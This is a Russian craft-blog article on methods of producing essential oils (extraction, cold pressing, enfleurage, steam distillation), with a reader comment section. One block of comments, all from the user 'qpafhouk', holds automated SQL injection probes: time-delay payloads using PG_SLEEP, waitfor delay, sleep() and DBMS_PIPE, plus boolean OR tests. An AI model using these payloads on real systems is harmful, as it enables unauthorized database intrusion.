Изготовление эфирных масел – несомненно, увлекательный и даже немного волшебный процесс. В зависимости от типа сырья, выделяют четыре основных метода производства эфирных масел:
- экстракция
- дистилляция
- анфлераж
- холодное прессование.
Экстракция – сырье заливают спиртом или другим растворителем, настаивают определенное время, а затем разделяют полученную смесь, например, выпаривая спирт. К недостаткам данного способа стоит отнести то, что вместе с эфирными маслами экстрагируются и другие компоненты, а при очистке зачастую остаются следы растворителя.
Холодное прессование – чаще всего применяется для изготовления цитрусовых эфирных масел. Кожуру просто выжимают, но при этом полученное масло также содержит примеси, от которых непросто избавиться.
Анфлераж – очень интересный способ, прекрасно описанный в книге «Парфюмер». На стекло наносят слой жира, а на него - лепестки цветов и закрывают еще одним стеклом. Через некоторое время сырье заменяют, иногда эту процедуру повторяют несколько раз. Полученную смесь либо разделяют с помощью спирта, либо используют в чистом виде. Этот метод подходит и для получения эфирных масел в домашних условиях (в качестве жира можно воспользоваться рафинированным кокосовым маслом).
О последнем способе мне бы хотелось рассказать подробнее:
Производство эфирных масел методом паровой дистилляции
Для этого используется специальная установка, по сути, очень напоминающая самогонный аппарат. В колбу с водой помещают высушенные листья или цветы, а затем начинают нагревать. Вода испаряется, и пар по трубочке направляется ко второй части установки – холодильнику, где он превращается обратно в воду. Но, при этом, он успевает захватить с собой эфирные масла и водорастворимые экстракты растения, таким образом, получается обогащенная вода (гидролат), а на ее поверхности плавает слой эфирного масла. Чтобы Вам было понятнее, я нарисовала схему:
В чем же преимущества этого метода?
- Во-первых, таким способом можно получать эфирные масла и в домашних условиях.
- Во-вторых, в качестве «побочного продукта» мы получаем гидролат, который можно использовать как в чистом виде, так и добавлять в состав множества косметических средств.
К сожалению, выход эфирного масла в данном случае часто очень незначительный, и он подходит только для тех растений, в которых изначально эфирного масла много, например, для тех же цитрусовых.
Ну и напоследок небольшая хитрость мыловару на заметку: если Вы хотите обогатить мыло кожурой цитрусовых или сушеными листьями, то перемалывайте их непосредственно перед добавлением в мыльце. Тогда оно получится более ароматным, так как при хранении в измельченном виде большая часть эфиров испаряется. Именно поэтому, кстати, перец часто продают в мельницах: при перемалывании высвобождается эфирное масло и блюдо становится острее и ароматнее!
автор: Наталия Вербена.
-
qpafhouk 22 ноября 2021 в 20:32555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),12)||'
-
qpafhouk 22 ноября 2021 в 20:32555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),12)
-
qpafhouk 22 ноября 2021 в 20:32Atb1OfWf')) OR 184=(SELECT 184 FROM PG_SLEEP(12))--
-
qpafhouk 22 ноября 2021 в 20:32Ib3Pgjbn') OR 839=(SELECT 839 FROM PG_SLEEP(12))--
-
qpafhouk 22 ноября 2021 в 20:32K0q5DPP0' OR 948=(SELECT 948 FROM PG_SLEEP(12))--
-
qpafhouk 22 ноября 2021 в 20:32-1)) OR 587=(SELECT 587 FROM PG_SLEEP(12))--
-
qpafhouk 22 ноября 2021 в 20:32-5) OR 92=(SELECT 92 FROM PG_SLEEP(12))--
-
qpafhouk 22 ноября 2021 в 20:32-5 OR 886=(SELECT 886 FROM PG_SLEEP(12))--
-
qpafhouk 22 ноября 2021 в 20:32v2qZMIn2'; waitfor delay '0:0:12' --
-
qpafhouk 22 ноября 2021 в 20:321 waitfor delay '0:0:12' --
-
qpafhouk 22 ноября 2021 в 20:32-1); waitfor delay '0:0:12' --
-
qpafhouk 22 ноября 2021 в 20:32-1; waitfor delay '0:0:12' --
-
qpafhouk 22 ноября 2021 в 20:32(select(0)from(select(sleep(12)))v)/*'+(select(0)from(select(sleep(12)))v)+'"+(select(0)from(select(sleep(12)))v)+"*/
-
qpafhouk 22 ноября 2021 в 20:320"XOR(if(now()=sysdate(),sleep(12),0))XOR"Z
-
qpafhouk 22 ноября 2021 в 20:320'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z
-
qpafhouk 22 ноября 2021 в 20:32if(now()=sysdate(),sleep(12),0)
-
qpafhouk 22 ноября 2021 в 20:32969'
-
qpafhouk 22 ноября 2021 в 20:32-1" OR 2+351-351-1=0+0+0+1 --
-
qpafhouk 22 ноября 2021 в 20:32-1' OR 2+141-141-1=0+0+0+1 or 'JQpiHRzl'='
-
qpafhouk 22 ноября 2021 в 20:32-1' OR 2+179-179-1=0+0+0+1 --
-
qpafhouk 22 ноября 2021 в 20:32-1 OR 2+891-891-1=0+0+0+1
-
qpafhouk 22 ноября 2021 в 20:32-1 OR 2+579-579-1=0+0+0+1 --
-
qpafhouk 22 ноября 2021 в 20:32555
-
qpafhouk 22 ноября 2021 в 20:32555
-
qpafhouk 22 ноября 2021 в 20:32555
-
qpafhouk 22 ноября 2021 в 20:32555
-
qpafhouk 22 ноября 2021 в 20:32555
-
qpafhouk 22 ноября 2021 в 20:32555
-
qpafhouk 22 ноября 2021 в 20:32555
-
qpafhouk 22 ноября 2021 в 20:32555
-
qpafhouk 22 ноября 2021 в 20:32555
-
qpafhouk 22 ноября 2021 в 20:32555
-
qpafhouk 22 ноября 2021 в 20:32555
-
qpafhouk 22 ноября 2021 в 20:32555
-
qpafhouk 22 ноября 2021 в 20:32555
-
qpafhouk 22 ноября 2021 в 20:32555
-
qpafhouk 22 ноября 2021 в 20:32555
-
qpafhouk 22 ноября 2021 в 20:32555
-
qpafhouk 22 ноября 2021 в 20:32555
-
qpafhouk 22 ноября 2021 в 20:32555
-
qpafhouk 22 ноября 2021 в 20:32555
-
qpafhouk 22 ноября 2021 в 20:32555
-
qpafhouk 22 ноября 2021 в 20:31JyI=
-
qpafhouk 22 ноября 2021 в 20:31@@dYNJj
-
qpafhouk 22 ноября 2021 в 20:31\
-
qpafhouk 22 ноября 2021 в 20:311'"
-
qpafhouk 22 ноября 2021 в 20:31555
-
Раиса Пухосмяги17 мая 2018 в 16:41слышала ,что на эф маслах ,которые вы разливаете из больших тар ,должна стоять надпись-температура воспломенения ,т есть в этом случаем вам надо ставить на каждом образце-который вы продаете 10 мл ,что бы покупатель знал,особенно кто варит мыло с нуля,можно ли гелить с этим эф маслом или не стоит,или хотя бы пишите информацию в образцах магазина.надеюсь моя мысль понятна.
-
Наталия Вербена18 мая 2018 в 11:37Раиса, спасибо, что написали, мы обсудим эту мысль
-
-
Мария Кузьмина4 июня 2017 в 14:26Здорово! Столько полезных статей у вас! Оторваться не могу)
-
Наталия Вербена5 июня 2017 в 11:25Спасибо большое! Такие комментарии очень мотивируют
-
-
Кира Костина11 июля 2014 в 16:25Отличная статья!
-
Комментарий удален из-за несоблюдения правил
-
Комментарий удален из-за несоблюдения правил
-